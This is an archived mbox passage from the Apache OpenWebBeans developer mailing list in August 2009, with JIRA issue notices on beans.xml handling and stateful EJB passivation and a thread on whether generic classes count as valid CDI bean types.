From [email protected] Sat Aug 01 21:56:33 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40995 invoked from network); 1 Aug 2009 21:56:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Aug 2009 21:56:33 -0000 Received: (qmail 38579 invoked by uid 500); 1 Aug 2009 21:56:37 -0000 Delivered-To: [email protected] Received: (qmail 38551 invoked by uid 500); 1 Aug 2009 21:56:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38540 invoked by uid 99); 1 Aug 2009 21:56:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 01 Aug 2009 21:56:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 01 Aug 2009 21:56:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C81DC234C004 for <[email protected]>; Sat, 1 Aug 2009 14:56:14 -0700 (PDT) Message-ID: <1420435456.1249163774805.JavaMail.jira@brutus> Date: Sat, 1 Aug 2009 14:56:14 -0700 (PDT) From: "Mark Struberg (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-126) remove old rules and formattings for handling of beans.xml MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org remove old rules and formattings for handling of beans.xml ---------------------------------------------------------- Key: OWB-126 URL: https://issues.apache.org/jira/browse/OWB-126 Project: OpenWebBeans Issue Type: Bug Affects Versions: M2 Reporter: Mark Struberg Assignee: Mark Struberg Fix For: M3 In the 'old' spec version, the XML based configuration was defined down to a very detailed level. Since then the spec has been changed heavily and now doesn't say much about XML configuration in general. There is no explicit XML section and beans.xml is only mentioned a few times: 1. policies {noformat} <beans> <policies> <class>org.mycompany.mock.MockAsynchronousService</class> <stereotype>org.mycompany.myfwk.Mock</stereotype> <stereotype>org.mycompany.site.Australian</stereotype> </policies> </beans> {noformat} 2. decorators {noformat} <beans> <decorators> <class>org.mycompany.myfwk.TimestampLogger</class> <class>org.mycompany.myfwk.IdentityLogger</class> </decorators> </beans> {noformat} 3. interceptors {noformat} <beans> <interceptors> <class>org.mycompany.myfwk.TransactionInterceptor</class> <class>org.mycompany.myfwk.LoggingInterceptor</class> </interceptors> </beans> {noformat} There is obviously no forced namespace anymore, which currently breaks most of the TCK tests. But I expect a lot more things need to be rewritten. My personal opinion is that we should _not_ remove the whole XML configuration stuff which we already have. It is not in the spec anymore, but it is a feature one needs in praxis. Anyway it has no high priority and we have to find our own syntax until a homogenic XML configuration will be aggreed upon in the next webbeans spec. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Aug 02 00:23:57 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88047 invoked from network); 2 Aug 2009 00:23:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Aug 2009 00:23:57 -0000 Received: (qmail 14525 invoked by uid 500); 2 Aug 2009 00:24:01 -0000 Delivered-To: [email protected] Received: (qmail 14496 invoked by uid 500); 2 Aug 2009 00:24:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 14485 invoked by uid 99); 2 Aug 2009 00:24:01 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 02 Aug 2009 00:24:00 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web27807.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Sun, 02 Aug 2009 00:23:48 +0000 Received: (qmail 43770 invoked by uid 60001); 2 Aug 2009 00:23:26 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1249172606; bh=WdIWt4VoM+whPcn6cTirWSHN8H0k2UHE+oJZGl/Y8HM=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type; b=xhEKBr3lZMh7XwNQC/SGYBrTxXORfJaXkLCnHhGa5ggE4N4wjniBsJAPE1OGialONKW1CihJgL3ejnN8CvjANhMUnBVOmvKPowp1EzmqyAukGsfAy0yyuSzLMqSOLFzmCtCFF+o2rzP1P07Xdjiqrt5YqwLQl6DD+hMezpGCV4E= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type; b=gu8KZRJXhFW2EwMltJ2V8AareNlFZKh/DEuIhyz8V3kzM78vYu6xevuJbj7JADoQuJfecL9RvW4vc0q2QtS2ev/zW0JMv4xhfegFxZYInqvacFnMX+Oqj++N7fvPmyZQVN4b1omeNszJLBRtITJr4uZgs6VHB5bejR003oCT1l0=; Message-ID: <[email protected]> X-YMail-OSG: RaS20.oVM1lNz5n.dSsnV303AOsCuRbkUOJBe2BOWJwJunWvRi37CkugoG_vr_IQuWNjpxjl2hK_Sor9.3ZwQEfNIiCRQd2VkbInFfbT7F9Ew9SMvvPBC1CBZqfLzwBeViXwM0DqU9Fof4zi93wN392v1gjS_vOmLExO4781CzL_RqLzzmBiBTkORhi2FHJdxzz55m66IshObj.s98uq73GeE2wx7D8SRspEvy_HPjSe2yLz_gEdFPWtDd.bq4xDhk8nhcH7n0jbf5JmdiyqITo0YzAEO6cjUeRAH8uBqXFsHUaXvTnwZJEWEH5fS0QHYg-- Received: from [161.129.204.104] by web27807.mail.ukl.yahoo.com via HTTP; Sun, 02 Aug 2009 00:23:26 GMT X-Mailer: YahooMailClassic/6.1.2 YahooMailWebService/0.7.289.15 Date: Sun, 2 Aug 2009 00:23:26 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: generic classes allowed as bean type? To: [email protected] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked by ClamAV on apache.org Hi! While trying to run the TCK suite, I came across a problem while parsing the class public class MockCreationalContext<T> implements CreationalContext<T>; with WebBeansLifecycle#applicationStarted The problem is the generic type T (a javax.reflect.generic.TypeVariable) which doesn't resolve to a 'real' class and since crashes OWB. How do we solve this? From reading the spec I cannot even say if this is a valid bean [email protected]. On the on hand it is not listed in the taxative list of valid bean types. On the other hand, an example with an _applied_ type is shown in the spec (class BookShop implements Shop<Book>) Gurkan, are you online tomorrow evening? LieGrue, strub From [email protected] Tue Aug 04 11:25:12 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 94960 invoked from network); 4 Aug 2009 11:25:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Aug 2009 11:25:12 -0000 Received: (qmail 56810 invoked by uid 500); 4 Aug 2009 11:25:17 -0000 Delivered-To: [email protected] Received: (qmail 56783 invoked by uid 500); 4 Aug 2009 11:25:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 56773 invoked by uid 99); 4 Aug 2009 11:25:17 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 04 Aug 2009 11:25:17 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f221.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 04 Aug 2009 11:25:09 +0000 Received: by bwz21 with SMTP id 21so2900220bwz.12 for <[email protected]>; Tue, 04 Aug 2009 04:24:47 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=oWpt6kQSdD5G8a7tIKmxGtSaPBeTK19jfbKKhUZiUvo=; b=nAV6Goki/D5tAAqMlGv8PV5PZ/rvLI7siynQslzp+tdceW2kGeT7ruKZYvpkHmcIbi 1T8G1UE/SVCZRfVhqv0CnrH4Z3OuRXLw2kALGS5p4wpnEj0QjyxnfhUQKdZwGIVUFG7S WfJZEBDWMpfbqALnbeurjzLBkGq4bH4XUlxuk= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=e8W6iQ1U1RfGnIIH+PPbB3p8hiFsMUFnak9aViLrtyHeQUwL7wBzIGBPwAg9zPFhbt 3NZQPkKf9Qo4LN/5+2KeHd7+XkaXSXEPQatt5BGbbArligh0xJURozHq9Hx3i0uK8oJA Fep+tWKe5vYYTdYYarWuyMt7Rw7vEMUqtEapU= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id a3mr736388bko.104.1249385083529; Tue, 04 Aug 2009 04:24:43 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Tue, 4 Aug 2009 14:24:43 +0300 Message-ID: <[email protected]> Subject: Re: generic classes allowed as bean type? From: Gurkan Erdogdu <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org hi I am now in holiday and no net connection here. I will be available on this sunday night. for question, generic type allows in bean types. please look at the spec generic types assignments section. there are several rules for resolution on generic types. thanks a lot gurkan 2009/8/2, Mark Struberg <[email protected]>: > > Hi! > > While trying to run the TCK suite, I came across a problem while parsing the > class > > public class MockCreationalContext<T> implements CreationalContext<T>; > > with WebBeansLifecycle#applicationStarted > > The problem is the generic type T (a javax.reflect.generic.TypeVariable) > which doesn't resolve to a 'real' class and since crashes OWB. > > How do we solve this? From reading the spec I cannot even say if this is a > valid bean [email protected]. > On the on hand it is not listed in the taxative list of valid bean types. > On the other hand, an example with an _applied_ type is shown in the spec > (class BookShop implements Shop<Book>) > > Gurkan, are you online tomorrow evening? > > LieGrue, > strub > > > > -- Gurkan Erdogdu http://gurkanerdogdu.blogspot.com From [email protected] Tue Aug 04 11:32:32 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 95861 invoked from network); 4 Aug 2009 11:32:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Aug 2009 11:32:32 -0000 Received: (qmail 69725 invoked by uid 500); 4 Aug 2009 11:32:37 -0000 Delivered-To: [email protected] Received: (qmail 69697 invoked by uid 500); 4 Aug 2009 11:32:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 69687 invoked by uid 99); 4 Aug 2009 11:32:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 04 Aug 2009 11:32:37 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-fx0-f224.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 04 Aug 2009 11:32:29 +0000 Received: by fxm24 with SMTP id 24so2952903fxm.12 for <[email protected]>; Tue, 04 Aug 2009 04:32:08 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=05FOJ0csZATpQlfiLFoi0UhlaUeiUfeg6UVoF0frA3A=; b=I0rznxBIQblpV1hUU73IhNIUW2tARAXl3hSBUHSW+IGXrylGqbEIKTSFsPoRGFfy9z 9WVOqjSNFa9raelY65WpPJisrmeVRQDw2xympohrBYGrtR9yR4oNJecq89jmGLweD76U MveVXY+fhuNJ7YU07IWjCbwlYHws5AJhzJcY8= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=eMck44g8Ls/V4/W9hkjDGUAUonyci0NjCXYrArFS0rD7KtnfULKrWPzEVNnSvvA2uL nNfdq7tWswHYW2WfjPTeEjVotghQS+kgqlda5oVSU0KQhn2oaWYhxG/kRb4+oWgs5/HQ F2aT+2zdcbqDz1TdulOhd8ia0Jb6fYLEQsktc= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id w10mr803170bkn.211.1249385527925; Tue, 04 Aug 2009 04:32:07 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Tue, 4 Aug 2009 14:32:07 +0300 Message-ID: <[email protected]> Subject: Re: generic classes allowed as bean type? From: Gurkan Erdogdu <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org more on this, type variable is not valid bean injection type. you can not resolve any bean to injection point with type variables. hope this helps; 2009/8/2, Mark Struberg <[email protected]>: > > Hi! > > While trying to run the TCK suite, I came across a problem while parsing the > class > > public class MockCreationalContext<T> implements CreationalContext<T>; > > with WebBeansLifecycle#applicationStarted > > The problem is the generic type T (a javax.reflect.generic.TypeVariable) > which doesn't resolve to a 'real' class and since crashes OWB. > > How do we solve this? From reading the spec I cannot even say if this is a > valid bean [email protected]. > On the on hand it is not listed in the taxative list of valid bean types. > On the other hand, an example with an _applied_ type is shown in the spec > (class BookShop implements Shop<Book>) > > Gurkan, are you online tomorrow evening? > > LieGrue, > strub > > > > -- Gurkan Erdogdu http://gurkanerdogdu.blogspot.com From [email protected] Tue Aug 04 11:40:17 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97583 invoked from network); 4 Aug 2009 11:40:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Aug 2009 11:40:17 -0000 Received: (qmail 79407 invoked by uid 500); 4 Aug 2009 11:40:22 -0000 Delivered-To: [email protected] Received: (qmail 79393 invoked by uid 500); 4 Aug 2009 11:40:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 79383 invoked by uid 99); 4 Aug 2009 11:40:22 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 04 Aug 2009 11:40:22 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO web27804.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 04 Aug 2009 11:40:11 +0000 Received: (qmail 55380 invoked by uid 60001); 4 Aug 2009 11:39:48 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1249385988; bh=SDAHQrBFWOnk7Dn2QUMJd88NFAr9fI298O9Fu/I/4e0=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=AyfwfPsASnm4u4zdUHNjWxoKC1CKK8dsmH4qypTIjKtVIk80r3uDOJcYf19PB84HL8MC3ARvo6CjQwOPZmeb3BcPD5ZAeRdGysG0jwr0QGJN7mhUxV99806k3or6VrjuxVaGcl8Gxa+duYsY1aeuEzG+Y4nVZBrzR8UNustxS0Y= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=LHBaMs6ThkXPptGIvCZro4V7smVJWlCVne11wrn8GlEpO1zZLLDB3X5LV6dQGmsDkyggCCIjwVXxAkGRVx30qVRtzNoyR5GfGzWFz/Pk1Ivb2qcNJu6hB6R1Ofp83uFmN6FiykrhHqQ+KRWSGHKTVRIK8ziggvAz9OFc0SGkO+s=; Message-ID: <[email protected]> X-YMail-OSG: bkgQHOsVM1mrlXzl7xN9ByodfVNjaOiTk3Zu3MWI4fENGCCk_Mr6BzwfQw2lMephJ4xAy.M5VKAqNPN3yrqRg6WkeDRxEJGPbYKy7FrSk1Hg9v412OVFDTQ_yNjLUvi6a_3X00zGIZDCnR7boQOjhPYdlvak8NCNBURcelRgAMp0XYFicP0CnlNSC3mw1LctOEijEUnvCapBD0YqptXELodaEXx3am7n9g_d2UivzTNxDwEwpuOhNlfRrCisTAR2IKPZQpFpOjcP5OMn_ps9x5G6FKgZB7CLEic_G0IlmGjdfI8Hwxa3NlvIiwKw_oviKxBuESyi1laf8dBHVZm7NvpZAFqGcMb4zhmIx2qp Received: from [161.129.204.104] by web27804.mail.ukl.yahoo.com via HTTP; Tue, 04 Aug 2009 11:39:48 GMT X-Mailer: YahooMailRC/1358.22 YahooMailWebService/0.7.289.15 References: <[email protected]> <[email protected]> Date: Tue, 4 Aug 2009 11:39:48 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: Re: generic classes allowed as bean type? To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked by ClamAV on apache.org Hi Gurkan! First, thanks for your answer! 2nd, enjoy your holidays :) I already found section 5.3.3 which answered my question. In general this usecase is a valid one, and is also covered in the TCK. Locally, I did a really dirty hack by returning Object.class as upper boundary from the type erasure for now (in ClassUtil#getClazz). I didn't check this in, but now I'm at least able to continue with the TCK hacking. LieGrue, strub ----- Original Message ---- > From: Gurkan Erdogdu <[email protected]> > To: [email protected] > Sent: Tuesday, August 4, 2009 1:32:07 PM > Subject: Re: generic classes allowed as bean type? > > more on this, type variable is not valid bean injection type. you can > not resolve any bean to injection point with type variables. > > hope this helps; > > 2009/8/2, Mark Struberg : > > > > Hi! > > > > While trying to run the TCK suite, I came across a problem while parsing the > > class > > > > public class MockCreationalContextimplements CreationalContext; > > > > with WebBeansLifecycle#applicationStarted > > > > The problem is the generic type T (a javax.reflect.generic.TypeVariable) > > which doesn't resolve to a 'real' class and since crashes OWB. > > > > How do we solve this? From reading the spec I cannot even say if this is a > > valid bean [email protected]. > > On the on hand it is not listed in the taxative list of valid bean types. > > On the other hand, an example with an _applied_ type is shown in the spec > > (class BookShop implements Shop) > > > > Gurkan, are you online tomorrow evening? > > > > LieGrue, > > strub > > > > > > > > > > > -- > Gurkan Erdogdu > http://gurkanerdogdu.blogspot.com From [email protected] Tue Aug 04 11:51:14 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 1282 invoked from network); 4 Aug 2009 11:51:14 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Aug 2009 11:51:14 -0000 Received: (qmail 88523 invoked by uid 500); 4 Aug 2009 11:51:19 -0000 Delivered-To: [email protected] Received: (qmail 88490 invoked by uid 500); 4 Aug 2009 11:51:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 88480 invoked by uid 99); 4 Aug 2009 11:51:19 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 04 Aug 2009 11:51:19 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f221.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 04 Aug 2009 11:51:11 +0000 Received: by bwz21 with SMTP id 21so2911845bwz.12 for <[email protected]>; Tue, 04 Aug 2009 04:50:50 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=fi5pT7K294eKqqVmUhpeDu3zXhnOMsbvgN/vh54zGyU=; b=SoEq1cuYLHeYIpXjOF6q2GsbAl7KmFr4S7B8YgNKiUFeUB38XQLoUjipcQkjZjZU09 m+ywqJ2qqVLa36+NQr+YagCq/vqXbOQa+IT3Z1t5lpPW0s4vnTC/QhYWlRhUR9WOwReu L4i53jx9BdufNBVrlu/YOEySHhhmlCA83wCf0= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=HURAljAB6jku4cjnWARXRSI7W9aZhk+FrsbQL80C/CpeEoF0Mj1hYNIBSkgc/Z2nF1 OWElDExkNWETvvg4jLZ719uyip61aL6adPkstL4Pu1X8K94OdrpBq+fNip8bbxf23YVl k76deoVWFlsB+gtiPaTBop5ukM6sGnxt0Ukdk= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id w15mr66441bkq.97.1249386650021; Tue, 04 Aug 2009 04:50:50 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Date: Tue, 4 Aug 2009 14:50:49 +0300 Message-ID: <[email protected]> Subject: Re: generic classes allowed as bean type? From: Gurkan Erdogdu <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Awesome! talk later than. thanks Gurkan 2009/8/4, Mark Struberg <[email protected]>: > > Hi Gurkan! > > First, thanks for your answer! > 2nd, enjoy your holidays :) > > I already found section 5.3.3 which answered my question. > In general this usecase is a valid one, and is also covered in the TCK. > > Locally, I did a really dirty hack by returning Object.class as upper > boundary from the type erasure for now (in ClassUtil#getClazz). > I didn't check this in, but now I'm at least able to continue with the TCK > hacking. > > LieGrue, > strub > > > > ----- Original Message ---- >> From: Gurkan Erdogdu <[email protected]> >> To: [email protected] >> Sent: Tuesday, August 4, 2009 1:32:07 PM >> Subject: Re: generic classes allowed as bean type? >> >> more on this, type variable is not valid bean injection type. you can >> not resolve any bean to injection point with type variables. >> >> hope this helps; >> >> 2009/8/2, Mark Struberg : >> > >> > Hi! >> > >> > While trying to run the TCK suite, I came across a problem while parsing >> > the >> > class >> > >> > public class MockCreationalContextimplements CreationalContext; >> > >> > with WebBeansLifecycle#applicationStarted >> > >> > The problem is the generic type T (a javax.reflect.generic.TypeVariable) >> > which doesn't resolve to a 'real' class and since crashes OWB. >> > >> > How do we solve this? From reading the spec I cannot even say if this is >> > a >> > valid bean [email protected]. >> > On the on hand it is not listed in the taxative list of valid bean >> > types. >> > On the other hand, an example with an _applied_ type is shown in the >> > spec >> > (class BookShop implements Shop) >> > >> > Gurkan, are you online tomorrow evening? >> > >> > LieGrue, >> > strub >> > >> > >> > >> > >> >> >> -- >> Gurkan Erdogdu >> http://gurkanerdogdu.blogspot.com > > > > > -- Gurkan Erdogdu http://gurkanerdogdu.blogspot.com From [email protected] Fri Aug 07 18:15:29 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 10033 invoked from network); 7 Aug 2009 18:15:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Aug 2009 18:15:29 -0000 Received: (qmail 66019 invoked by uid 500); 7 Aug 2009 18:15:36 -0000 Delivered-To: [email protected] Received: (qmail 65991 invoked by uid 500); 7 Aug 2009 18:15:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 65981 invoked by uid 99); 7 Aug 2009 18:15:36 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 07 Aug 2009 18:15:36 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 07 Aug 2009 18:15:34 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C86DD234C004 for <[email protected]>; Fri, 7 Aug 2009 11:15:14 -0700 (PDT) Message-ID: <1891797531.1249668914810.JavaMail.jira@brutus> Date: Fri, 7 Aug 2009 11:15:14 -0700 (PDT) From: "Mark Struberg (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-127) @Stateful EJBs have to be handled as being passivation capable MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org @Stateful EJBs have to be handled as being passivation capable -------------------------------------------------------------- Key: OWB-127 URL: https://issues.apache.org/jira/browse/OWB-127 Project: OpenWebBeans Issue Type: Bug Reporter: Mark Struberg Assignee: Gurkan Erdogdu Currently the container complains about @Stateful session beans do not have the Interface Serializable. This check must not be performed for stateful session beans, since they are per se passivation capable. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Aug 09 10:37:59 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84748 invoked from network); 9 Aug 2009 10:37:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Aug 2009 10:37:59 -0000 Received: (qmail 35868 invoked by uid 500); 9 Aug 2009 10:38:06 -0000 Delivered-To: [email protected] Received: (qmail 35839 invoked by uid 500); 9 Aug 2009 10:38:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 35829 invoked by uid 99); 9 Aug 2009 10:38:05 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 09 Aug 2009 10:38:05 +0000 X-ASF-Spam-Status: No, hits=3.2 required=10.0 tests=RCVD_IN_BL_SPAMCOP_NET,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web27802.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Sun, 09 Aug 2009 10:37:53 +0000 Received: (qmail 55734 invoked by uid 60001); 9 Aug 2009 10:37:32 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1249814252; bh=U8bhO192BJvB0V3Amj73CkaA1nTVCNAUq7xIiwrDBJk=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type; b=uUz/anvMT0nBXdoxsMtgm+TbC6KaoSuYYOgmB+0hMpv/K+D4J0ruFUPYXjs0dImD+XwOad2z+qElT9d6k7WGqhy4FEvwQOV06ZkNu8Le64vh3u2qT+4jnHUv2d4Wxj7N3HmfBG2SKCyGkEtzOTENCCVCfiAGceV7NvAExR7R/zA= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type; 